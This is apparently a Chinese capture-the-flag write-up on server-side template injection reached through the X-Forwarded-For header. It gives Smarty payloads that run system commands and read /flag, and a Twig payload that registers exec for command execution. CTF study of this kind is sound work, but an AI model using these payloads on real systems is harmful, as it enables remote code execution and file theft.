看到IP立马就想到了XFF
测试了一下,存在模板注入。是smarty注入。
Twig
{{7*‘7’}} #输出49
Jinja
{{7*‘7’}} #输出7777777
smarty注入payload
{if phpinfo()}{/if}
{if system(‘ls’)}{/if}
{ readfile(’/flag’) }
{if show_source(’/flag’)}{/if}
{if system(‘cat flag’)}{/if}
最终的到flag
Twig注入payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} //将id换为cat /flag即可